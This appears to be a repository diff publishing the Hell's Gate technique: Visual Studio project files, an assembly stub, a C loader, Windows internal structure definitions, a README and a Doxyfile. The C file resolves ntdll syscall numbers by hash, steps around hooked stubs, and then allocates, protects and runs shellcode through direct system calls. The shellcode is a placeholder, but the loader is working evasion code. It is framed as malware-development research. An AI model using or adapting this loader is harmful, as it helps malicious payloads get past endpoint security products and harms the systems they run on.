<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="main.c" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="structs.h" />
</ItemGroup>
<ItemGroup>
<MASM Include="hellsgate.asm">
<FileType>Document</FileType>
</MASM>
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
</ImportGroup>
</Project>

32
Hells Gate/C Implementation/HellsGate/HellsGate.vcxproj.filters
Unescape View File

@ -0,0 +1,32 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;c++;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Header Files">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
</Filter>
<Filter Include="Resource Files">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="main.c">
<Filter>Source Files</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="structs.h">
<Filter>Header Files</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<MASM Include="hellsgate.asm">
<Filter>Source Files</Filter>
</MASM>
</ItemGroup>
</Project>

23
Hells Gate/C Implementation/HellsGate/hellsgate.asm
Unescape View File

@ -0,0 +1,23 @@
; Hell's Gate
; Dynamic system call invocation
;
; by smelly__vx (@RtlMateusz) and am0nsec (@am0nsec)
.data
wSystemCall DWORD 000h
.code
HellsGate PROC
mov wSystemCall, 000h
mov wSystemCall, ecx
ret
HellsGate ENDP
HellDescent PROC
mov r10, rcx
mov eax, wSystemCall
syscall
ret
HellDescent ENDP
end

211
Hells Gate/C Implementation/HellsGate/main.c
Unescape View File

@ -0,0 +1,211 @@
#pragma once
#include <Windows.h>
#include "structs.h"
/*--------------------------------------------------------------------
VX Tables
--------------------------------------------------------------------*/
typedef struct _VX_TABLE_ENTRY {
PVOID pAddress;
DWORD64 dwHash;
WORD wSystemCall;
} VX_TABLE_ENTRY, * PVX_TABLE_ENTRY;
typedef struct _VX_TABLE {
VX_TABLE_ENTRY NtAllocateVirtualMemory;
VX_TABLE_ENTRY NtProtectVirtualMemory;
VX_TABLE_ENTRY NtCreateThreadEx;
VX_TABLE_ENTRY NtWaitForSingleObject;
} VX_TABLE, * PVX_TABLE;
/*--------------------------------------------------------------------
Function prototypes.
--------------------------------------------------------------------*/
PTEB RtlGetThreadEnvironmentBlock();
BOOL GetImageExportDirectory(
_In_ PVOID pModuleBase,
_Out_ PIMAGE_EXPORT_DIRECTORY* ppImageExportDirectory
);
BOOL GetVxTableEntry(
_In_ PVOID pModuleBase,
_In_ PIMAGE_EXPORT_DIRECTORY pImageExportDirectory,
_In_ PVX_TABLE_ENTRY pVxTableEntry
);
BOOL Payload(
_In_ PVX_TABLE pVxTable
);
PVOID VxMoveMemory(
_Inout_ PVOID dest,
_In_ const PVOID src,
_In_ SIZE_T len
);
/*--------------------------------------------------------------------
External functions' prototype.
--------------------------------------------------------------------*/
extern VOID HellsGate(WORD wSystemCall);
extern HellDescent();
INT wmain() {
PTEB pCurrentTeb = RtlGetThreadEnvironmentBlock();
PPEB pCurrentPeb = pCurrentTeb->ProcessEnvironmentBlock;
if (!pCurrentPeb || !pCurrentTeb || pCurrentPeb->OSMajorVersion != 0xA)
return 0x1;
// Get NTDLL module
PLDR_DATA_TABLE_ENTRY pLdrDataEntry = (PLDR_DATA_TABLE_ENTRY)((PBYTE)pCurrentPeb->LoaderData->InMemoryOrderModuleList.Flink->Flink - 0x10);
// Get the EAT of NTDLL
PIMAGE_EXPORT_DIRECTORY pImageExportDirectory = NULL;
if (!GetImageExportDirectory(pLdrDataEntry->DllBase, &pImageExportDirectory) || pImageExportDirectory == NULL)
return 0x01;
VX_TABLE Table = { 0 };
Table.NtAllocateVirtualMemory.dwHash = 0xf5bd373480a6b89b;
if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtAllocateVirtualMemory))
return 0x1;
Table.NtCreateThreadEx.dwHash = 0x64dc7db288c5015f;
if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtCreateThreadEx))
return 0x1;
Table.NtProtectVirtualMemory.dwHash = 0x858bcb1046fb6a37;
if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtProtectVirtualMemory))
return 0x1;
Table.NtWaitForSingleObject.dwHash = 0xc6a2fa174e551bcb;
if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtWaitForSingleObject))
return 0x1;
Payload(&Table);
return 0x00;
}
PTEB RtlGetThreadEnvironmentBlock() {
#if _WIN64
return (PTEB)__readgsqword(0x30);
#else
return (PTEB)__readfsdword(0x16);
#endif
}
DWORD64 djb2(PBYTE str) {
DWORD64 dwHash = 0x7734773477347734;
INT c;
while (c = *str++)
dwHash = ((dwHash << 0x5) + dwHash) + c;
return dwHash;
}
BOOL GetImageExportDirectory(PVOID pModuleBase, PIMAGE_EXPORT_DIRECTORY* ppImageExportDirectory) {
// Get DOS header
PIMAGE_DOS_HEADER pImageDosHeader = (PIMAGE_DOS_HEADER)pModuleBase;
if (pImageDosHeader->e_magic != IMAGE_DOS_SIGNATURE) {
return FALSE;
}
// Get NT headers
PIMAGE_NT_HEADERS pImageNtHeaders = (PIMAGE_NT_HEADERS)((PBYTE)pModuleBase + pImageDosHeader->e_lfanew);
if (pImageNtHeaders->Signature != IMAGE_NT_SIGNATURE) {
return FALSE;
}
// Get the EAT
*ppImageExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((PBYTE)pModuleBase + pImageNtHeaders->OptionalHeader.DataDirectory[0].VirtualAddress);
return TRUE;
}
BOOL GetVxTableEntry(PVOID pModuleBase, PIMAGE_EXPORT_DIRECTORY pImageExportDirectory, PVX_TABLE_ENTRY pVxTableEntry) {
PDWORD pdwAddressOfFunctions = (PDWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfFunctions);
PDWORD pdwAddressOfNames = (PDWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfNames);
PWORD pwAddressOfNameOrdinales = (PWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfNameOrdinals);
for (WORD cx = 0; cx < pImageExportDirectory->NumberOfNames; cx++) {
PCHAR pczFunctionName = (PCHAR)((PBYTE)pModuleBase + pdwAddressOfNames[cx]);
PVOID pFunctionAddress = (PBYTE)pModuleBase + pdwAddressOfFunctions[pwAddressOfNameOrdinales[cx]];
if (djb2(pczFunctionName) == pVxTableEntry->dwHash) {
pVxTableEntry->pAddress = pFunctionAddress;
// Quick and dirty fix in case the function has been hooked
WORD cw = 0;
while (TRUE) {
// check if syscall, in this case we are too far
if (*((PBYTE)pFunctionAddress + cw) == 0x0f && *((PBYTE)pFunctionAddress + cw + 1) == 0x05)
return FALSE;
// check if ret, in this case we are also probaly too far
if (*((PBYTE)pFunctionAddress + cw) == 0xc3)
return FALSE;
// First opcodes should be :
// MOV R10, RCX
// MOV RCX, <syscall>
if (*((PBYTE)pFunctionAddress + cw) == 0x4c
&& *((PBYTE)pFunctionAddress + 1 + cw) == 0x8b
&& *((PBYTE)pFunctionAddress + 2 + cw) == 0xd1
&& *((PBYTE)pFunctionAddress + 3 + cw) == 0xb8
&& *((PBYTE)pFunctionAddress + 6 + cw) == 0x00
&& *((PBYTE)pFunctionAddress + 7 + cw) == 0x00) {
BYTE high = *((PBYTE)pFunctionAddress + 5 + cw);
BYTE low = *((PBYTE)pFunctionAddress + 4 + cw);
pVxTableEntry->wSystemCall = (high << 8) | low;
break;
}
cw++;
};
}
}
return TRUE;
}
BOOL Payload(PVX_TABLE pVxTable) {
NTSTATUS status = 0x00000000;
char shellcode[] = "\x90\x90\x90\x90\xcc\xcc\xcc\xcc\xc3";
// Allocate memory for the shellcode
PVOID lpAddress = NULL;
SIZE_T sDataSize = sizeof(shellcode);
HellsGate(pVxTable->NtAllocateVirtualMemory.wSystemCall);
status = HellDescent((HANDLE)-1, &lpAddress, 0, &sDataSize, MEM_COMMIT, PAGE_READWRITE);
// Write Memory
VxMoveMemory(lpAddress, shellcode, sizeof(shellcode));
// Change page permissions
ULONG ulOldProtect = 0;
HellsGate(pVxTable->NtProtectVirtualMemory.wSystemCall);
status = HellDescent((HANDLE)-1, &lpAddress, &sDataSize, PAGE_EXECUTE_READ, &ulOldProtect);
// Create thread
HANDLE hHostThread = INVALID_HANDLE_VALUE;
HellsGate(pVxTable->NtCreateThreadEx.wSystemCall);
status = HellDescent(&hHostThread, 0x1FFFFF, NULL, (HANDLE)-1, (LPTHREAD_START_ROUTINE)lpAddress, NULL, FALSE, NULL, NULL, NULL, NULL);
// Wait for 1 seconds
LARGE_INTEGER Timeout;
Timeout.QuadPart = -10000000;
HellsGate(pVxTable->NtWaitForSingleObject.wSystemCall);
status = HellDescent(hHostThread, FALSE, &Timeout);
return TRUE;
}
PVOID VxMoveMemory(PVOID dest, const PVOID src, SIZE_T len) {
char* d = dest;
const char* s = src;
if (d < s)
while (len--)
*d++ = *s++;
else {
char* lasts = s + (len - 1);
char* lastd = d + (len - 1);
while (len--)
*lastd-- = *lasts--;
}
return dest;
}

337
Hells Gate/C Implementation/HellsGate/structs.h
Unescape View File

@ -0,0 +1,337 @@
#pragma once
#include <Windows.h>
/*--------------------------------------------------------------------
STRUCTURES
--------------------------------------------------------------------*/
typedef struct _LSA_UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} LSA_UNICODE_STRING, * PLSA_UNICODE_STRING, UNICODE_STRING, * PUNICODE_STRING, * PUNICODE_STR;
typedef struct _LDR_MODULE {
LIST_ENTRY InLoadOrderModuleList;
LIST_ENTRY InMemoryOrderModuleList;
LIST_ENTRY InInitializationOrderModuleList;
PVOID BaseAddress;
PVOID EntryPoint;
ULONG SizeOfImage;
UNICODE_STRING FullDllName;
UNICODE_STRING BaseDllName;
ULONG Flags;
SHORT LoadCount;
SHORT TlsIndex;
LIST_ENTRY HashTableEntry;
ULONG TimeDateStamp;
} LDR_MODULE, * PLDR_MODULE;
typedef struct _PEB_LDR_DATA {
ULONG Length;
ULONG Initialized;
PVOID SsHandle;
LIST_ENTRY InLoadOrderModuleList;
LIST_ENTRY InMemoryOrderModuleList;
LIST_ENTRY InInitializationOrderModuleList;
} PEB_LDR_DATA, * PPEB_LDR_DATA;
typedef struct _PEB {
BOOLEAN InheritedAddressSpace;
BOOLEAN ReadImageFileExecOptions;
BOOLEAN BeingDebugged;
BOOLEAN Spare;
HANDLE Mutant;
PVOID ImageBase;
PPEB_LDR_DATA LoaderData;
PVOID ProcessParameters;
PVOID SubSystemData;
PVOID ProcessHeap;
PVOID FastPebLock;
PVOID FastPebLockRoutine;
PVOID FastPebUnlockRoutine;
ULONG EnvironmentUpdateCount;
PVOID* KernelCallbackTable;
PVOID EventLogSection;
PVOID EventLog;
PVOID FreeList;
ULONG TlsExpansionCounter;
PVOID TlsBitmap;
ULONG TlsBitmapBits[0x2];
PVOID ReadOnlySharedMemoryBase;
PVOID ReadOnlySharedMemoryHeap;
PVOID* ReadOnlyStaticServerData;
PVOID AnsiCodePageData;
PVOID OemCodePageData;
PVOID UnicodeCaseTableData;
ULONG NumberOfProcessors;
ULONG NtGlobalFlag;
BYTE Spare2[0x4];
LARGE_INTEGER CriticalSectionTimeout;
ULONG HeapSegmentReserve;
ULONG HeapSegmentCommit;
ULONG HeapDeCommitTotalFreeThreshold;
ULONG HeapDeCommitFreeBlockThreshold;
ULONG NumberOfHeaps;
ULONG MaximumNumberOfHeaps;
PVOID** ProcessHeaps;
PVOID GdiSharedHandleTable;
PVOID ProcessStarterHelper;
PVOID GdiDCAttributeList;
PVOID LoaderLock;
ULONG OSMajorVersion;
ULONG OSMinorVersion;
ULONG OSBuildNumber;
ULONG OSPlatformId;
ULONG ImageSubSystem;
ULONG ImageSubSystemMajorVersion;
ULONG ImageSubSystemMinorVersion;
ULONG GdiHandleBuffer[0x22];
ULONG PostProcessInitRoutine;
ULONG TlsExpansionBitmap;
BYTE TlsExpansionBitmapBits[0x80];
ULONG SessionId;
} PEB, * PPEB;
typedef struct __CLIENT_ID {
HANDLE UniqueProcess;
HANDLE UniqueThread;
} CLIENT_ID, * PCLIENT_ID;
typedef struct _TEB_ACTIVE_FRAME_CONTEXT {
ULONG Flags;
PCHAR FrameName;
} TEB_ACTIVE_FRAME_CONTEXT, * PTEB_ACTIVE_FRAME_CONTEXT;
typedef struct _TEB_ACTIVE_FRAME {
ULONG Flags;
struct _TEB_ACTIVE_FRAME* Previous;
PTEB_ACTIVE_FRAME_CONTEXT Context;
} TEB_ACTIVE_FRAME, * PTEB_ACTIVE_FRAME;
typedef struct _GDI_TEB_BATCH {
ULONG Offset;
ULONG HDC;
ULONG Buffer[310];
} GDI_TEB_BATCH, * PGDI_TEB_BATCH;
typedef PVOID PACTIVATION_CONTEXT;
typedef struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME {
struct __RTL_ACTIVATION_CONTEXT_STACK_FRAME* Previous;
PACTIVATION_CONTEXT ActivationContext;
ULONG Flags;
} RTL_ACTIVATION_CONTEXT_STACK_FRAME, * PRTL_ACTIVATION_CONTEXT_STACK_FRAME;
typedef struct _ACTIVATION_CONTEXT_STACK {
PRTL_ACTIVATION_CONTEXT_STACK_FRAME ActiveFrame;
LIST_ENTRY FrameListCache;
ULONG Flags;
ULONG NextCookieSequenceNumber;
ULONG StackId;
} ACTIVATION_CONTEXT_STACK, * PACTIVATION_CONTEXT_STACK;
typedef struct _TEB {
NT_TIB NtTib;
PVOID EnvironmentPointer;
CLIENT_ID ClientId;
PVOID ActiveRpcHandle;
PVOID ThreadLocalStoragePointer;
PPEB ProcessEnvironmentBlock;
ULONG LastErrorValue;
ULONG CountOfOwnedCriticalSections;
PVOID CsrClientThread;
PVOID Win32ThreadInfo;
ULONG User32Reserved[26];
ULONG UserReserved[5];
PVOID WOW32Reserved;
LCID CurrentLocale;
ULONG FpSoftwareStatusRegister;
PVOID SystemReserved1[54];
LONG ExceptionCode;
#if (NTDDI_VERSION >= NTDDI_LONGHORN)
PACTIVATION_CONTEXT_STACK* ActivationContextStackPointer;
UCHAR SpareBytes1[0x30 - 3 * sizeof(PVOID)];
ULONG TxFsContext;
#elif (NTDDI_VERSION >= NTDDI_WS03)
PACTIVATION_CONTEXT_STACK ActivationContextStackPointer;
UCHAR SpareBytes1[0x34 - 3 * sizeof(PVOID)];
#else
ACTIVATION_CONTEXT_STACK ActivationContextStack;
UCHAR SpareBytes1[24];
#endif
GDI_TEB_BATCH GdiTebBatch;
CLIENT_ID RealClientId;
PVOID GdiCachedProcessHandle;
ULONG GdiClientPID;
ULONG GdiClientTID;
PVOID GdiThreadLocalInfo;
PSIZE_T Win32ClientInfo[62];
PVOID glDispatchTable[233];
PSIZE_T glReserved1[29];
PVOID glReserved2;
PVOID glSectionInfo;
PVOID glSection;
PVOID glTable;
PVOID glCurrentRC;
PVOID glContext;
NTSTATUS LastStatusValue;
UNICODE_STRING StaticUnicodeString;
WCHAR StaticUnicodeBuffer[261];
PVOID DeallocationStack;
PVOID TlsSlots[64];
LIST_ENTRY TlsLinks;
PVOID Vdm;
PVOID ReservedForNtRpc;
PVOID DbgSsReserved[2];
#if (NTDDI_VERSION >= NTDDI_WS03)
ULONG HardErrorMode;
#else
ULONG HardErrorsAreDisabled;
#endif
#if (NTDDI_VERSION >= NTDDI_LONGHORN)
PVOID Instrumentation[13 - sizeof(GUID) / sizeof(PVOID)];
GUID ActivityId;
PVOID SubProcessTag;
PVOID EtwLocalData;
PVOID EtwTraceData;
#elif (NTDDI_VERSION >= NTDDI_WS03)
PVOID Instrumentation[14];
PVOID SubProcessTag;
PVOID EtwLocalData;
#else
PVOID Instrumentation[16];
#endif
PVOID WinSockData;
ULONG GdiBatchCount;
#if (NTDDI_VERSION >= NTDDI_LONGHORN)
BOOLEAN SpareBool0;
BOOLEAN SpareBool1;
BOOLEAN SpareBool2;
#else
BOOLEAN InDbgPrint;
BOOLEAN FreeStackOnTermination;
BOOLEAN HasFiberData;
#endif
UCHAR IdealProcessor;
#if (NTDDI_VERSION >= NTDDI_WS03)
ULONG GuaranteedStackBytes;
#else
ULONG Spare3;
#endif
PVOID ReservedForPerf;
PVOID ReservedForOle;
ULONG WaitingOnLoaderLock;
#if (NTDDI_VERSION >= NTDDI_LONGHORN)
PVOID SavedPriorityState;
ULONG_PTR SoftPatchPtr1;
ULONG_PTR ThreadPoolData;
#elif (NTDDI_VERSION >= NTDDI_WS03)
ULONG_PTR SparePointer1;
ULONG_PTR SoftPatchPtr1;
ULONG_PTR SoftPatchPtr2;
#else
Wx86ThreadState Wx86Thread;
#endif
PVOID* TlsExpansionSlots;
#if defined(_WIN64) && !defined(EXPLICIT_32BIT)
PVOID DeallocationBStore;
PVOID BStoreLimit;
#endif
ULONG ImpersonationLocale;
ULONG IsImpersonating;
PVOID NlsCache;
PVOID pShimData;
ULONG HeapVirtualAffinity;
HANDLE CurrentTransactionHandle;
PTEB_ACTIVE_FRAME ActiveFrame;
#if (NTDDI_VERSION >= NTDDI_WS03)
PVOID FlsData;
#endif
#if (NTDDI_VERSION >= NTDDI_LONGHORN)
PVOID PreferredLangauges;
PVOID UserPrefLanguages;
PVOID MergedPrefLanguages;
ULONG MuiImpersonation;
union
{
struct
{
USHORT SpareCrossTebFlags : 16;
};
USHORT CrossTebFlags;
};
union
{
struct
{
USHORT DbgSafeThunkCall : 1;
USHORT DbgInDebugPrint : 1;
USHORT DbgHasFiberData : 1;
USHORT DbgSkipThreadAttach : 1;
USHORT DbgWerInShipAssertCode : 1;
USHORT DbgIssuedInitialBp : 1;
USHORT DbgClonedThread : 1;
USHORT SpareSameTebBits : 9;
};
USHORT SameTebFlags;
};
PVOID TxnScopeEntercallback;
PVOID TxnScopeExitCAllback;
PVOID TxnScopeContext;
ULONG LockCount;
ULONG ProcessRundown;
ULONG64 LastSwitchTime;
ULONG64 TotalSwitchOutTime;
LARGE_INTEGER WaitReasonBitMap;
#else
BOOLEAN SafeThunkCall;
BOOLEAN BooleanSpare[3];
#endif
} TEB, * PTEB;
typedef struct _LDR_DATA_TABLE_ENTRY {
LIST_ENTRY InLoadOrderLinks;
LIST_ENTRY InMemoryOrderLinks;
LIST_ENTRY InInitializationOrderLinks;
PVOID DllBase;
PVOID EntryPoint;
ULONG SizeOfImage;
UNICODE_STRING FullDllName;
UNICODE_STRING BaseDllName;
ULONG Flags;
WORD LoadCount;
WORD TlsIndex;
union {
LIST_ENTRY HashLinks;
struct {
PVOID SectionPointer;
ULONG CheckSum;
};
};
union {
ULONG TimeDateStamp;
PVOID LoadedImports;
};
PACTIVATION_CONTEXT EntryPointActivationContext;
PVOID PatchInformation;
LIST_ENTRY ForwarderLinks;
LIST_ENTRY ServiceTagLinks;
LIST_ENTRY StaticLinks;
} LDR_DATA_TABLE_ENTRY, * PLDR_DATA_TABLE_ENTRY;
typedef struct _OBJECT_ATTRIBUTES {
ULONG Length;
PVOID RootDirectory;
PUNICODE_STRING ObjectName;
ULONG Attributes;
PVOID SecurityDescriptor;
PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;
typedef struct _INITIAL_TEB {
PVOID StackBase;
PVOID StackLimit;
PVOID StackCommit;
PVOID StackCommitMax;
PVOID StackReserved;
} INITIAL_TEB, * PINITIAL_TEB;

21
Hells Gate/C Implementation/README.md
Unescape View File

@ -0,0 +1,21 @@
## Hell's Gate ##
Original C Implementation of the Hell's Gate VX Technique
<br />
<br />
Link to the paper: https://vxug.fakedoma.in/papers/hells-gate.pdf
<br /> PDF also included in this repository.
<br />
<br />
Authors:
* Paul Laîné (@am0nsec)
* smelly__vx (@RtlMateusz)
<br />
### Update ###
Please note:
* We are not claiming that this is ground-breaking as many people have been using this kind of technique for many years;
* We are not claiming that this is the perfect and most optimised way to archive the objective. This is just one example on how to implementation the technique;
* Judging the idea/technique/project/research solely on the name is petty to say the least and definitively childish; and
* Any recommendation and/or ideas will always be welcome, just open an issue in this repository.

385
Hells Gate/C# Implementation/Doxyfile
Unescape View File

@ -0,0 +1,385 @@
# Doxyfile 1.8.18
#---------------------------------------------------------------------------
# Project related configuration options
#---------------------------------------------------------------------------
DOXYFILE_ENCODING = UTF-8
PROJECT_NAME = "Shap Hell's Gate"
PROJECT_NUMBER = 1.0
PROJECT_BRIEF = "C# Implementation of the Hell's Gate VX Technique"
PROJECT_LOGO =
OUTPUT_DIRECTORY = ./doc/
CREATE_SUBDIRS = YES
ALLOW_UNICODE_NAMES = NO
OUTPUT_LANGUAGE = English
OUTPUT_TEXT_DIRECTION = None
BRIEF_MEMBER_DESC = YES
REPEAT_BRIEF = YES
ABBREVIATE_BRIEF = "The $name class" \
"The $name widget" \
"The $name file" \
is \
provides \
specifies \
contains \
represents \
a \
an \
the
ALWAYS_DETAILED_SEC = NO
INLINE_INHERITED_MEMB = NO
FULL_PATH_NAMES = YES
STRIP_FROM_PATH =
STRIP_FROM_INC_PATH =
SHORT_NAMES = NO
JAVADOC_AUTOBRIEF = NO
JAVADOC_BANNER = NO
QT_AUTOBRIEF = NO
MULTILINE_CPP_IS_BRIEF = NO
INHERIT_DOCS = YES
SEPARATE_MEMBER_PAGES = NO
TAB_SIZE = 4
ALIASES =
OPTIMIZE_OUTPUT_FOR_C = NO
OPTIMIZE_OUTPUT_JAVA = NO
OPTIMIZE_FOR_FORTRAN = NO
OPTIMIZE_OUTPUT_VHDL = NO
OPTIMIZE_OUTPUT_SLICE = NO
EXTENSION_MAPPING =
MARKDOWN_SUPPORT = YES
TOC_INCLUDE_HEADINGS = 5
AUTOLINK_SUPPORT = YES
BUILTIN_STL_SUPPORT = NO
CPP_CLI_SUPPORT = NO
SIP_SUPPORT = NO
IDL_PROPERTY_SUPPORT = YES
DISTRIBUTE_GROUP_DOC = NO
GROUP_NESTED_COMPOUNDS = NO
SUBGROUPING = YES
INLINE_GROUPED_CLASSES = NO
INLINE_SIMPLE_STRUCTS = NO
TYPEDEF_HIDES_STRUCT = NO
LOOKUP_CACHE_SIZE = 0
#---------------------------------------------------------------------------
# Build related configuration options
#---------------------------------------------------------------------------
EXTRACT_ALL = YES
EXTRACT_PRIVATE = YES
EXTRACT_PRIV_VIRTUAL = YES
EXTRACT_PACKAGE = YES
EXTRACT_STATIC = YES
EXTRACT_LOCAL_CLASSES = YES
EXTRACT_LOCAL_METHODS = NO
EXTRACT_ANON_NSPACES = YES
HIDE_UNDOC_MEMBERS = NO
HIDE_UNDOC_CLASSES = NO
HIDE_FRIEND_COMPOUNDS = NO
HIDE_IN_BODY_DOCS = NO
INTERNAL_DOCS = NO
CASE_SENSE_NAMES = YES
HIDE_SCOPE_NAMES = NO
HIDE_COMPOUND_REFERENCE= NO
SHOW_INCLUDE_FILES = YES
SHOW_GROUPED_MEMB_INC = NO
FORCE_LOCAL_INCLUDES = NO
INLINE_INFO = YES
SORT_MEMBER_DOCS = YES
SORT_BRIEF_DOCS = NO
SORT_MEMBERS_CTORS_1ST = NO
SORT_GROUP_NAMES = NO
SORT_BY_SCOPE_NAME = NO
STRICT_PROTO_MATCHING = NO
GENERATE_TODOLIST = YES
GENERATE_TESTLIST = YES
GENERATE_BUGLIST = YES
GENERATE_DEPRECATEDLIST= YES
ENABLED_SECTIONS =
MAX_INITIALIZER_LINES = 30
SHOW_USED_FILES = YES
SHOW_FILES = YES
SHOW_NAMESPACES = YES
FILE_VERSION_FILTER =
LAYOUT_FILE =
CITE_BIB_FILES =
#---------------------------------------------------------------------------
# Configuration options related to warning and progress messages
#---------------------------------------------------------------------------
QUIET = NO
WARNINGS = YES
WARN_IF_UNDOCUMENTED = YES
WARN_IF_DOC_ERROR = YES
WARN_NO_PARAMDOC = NO
WARN_AS_ERROR = NO
WARN_FORMAT = "$file:$line: $text"
WARN_LOGFILE =
#---------------------------------------------------------------------------
# Configuration options related to the input files
#---------------------------------------------------------------------------
INPUT = .
INPUT_ENCODING = UTF-8
FILE_PATTERNS = *.c \
*.cc \
*.cxx \
*.cpp \
*.c++ \
*.java \
*.ii \
*.ixx \
*.ipp \
*.i++ \
*.inl \
*.idl \
*.ddl \
*.odl \
*.h \
*.hh \
*.hxx \
*.hpp \
*.h++ \
*.cs \
*.d \
*.php \
*.php4 \
*.php5 \
*.phtml \
*.inc \
*.m \
*.markdown \
*.md \
*.mm \
*.dox \
*.doc \
*.txt \
*.py \
*.pyw \
*.f90 \
*.f95 \
*.f03 \
*.f08 \
*.f18 \
*.f \
*.for \
*.vhd \
*.vhdl \
*.ucf \
*.qsf \
*.ice
RECURSIVE = YES
EXCLUDE =
EXCLUDE_SYMLINKS = NO
EXCLUDE_PATTERNS =
EXCLUDE_SYMBOLS =
EXAMPLE_PATH =
EXAMPLE_PATTERNS = *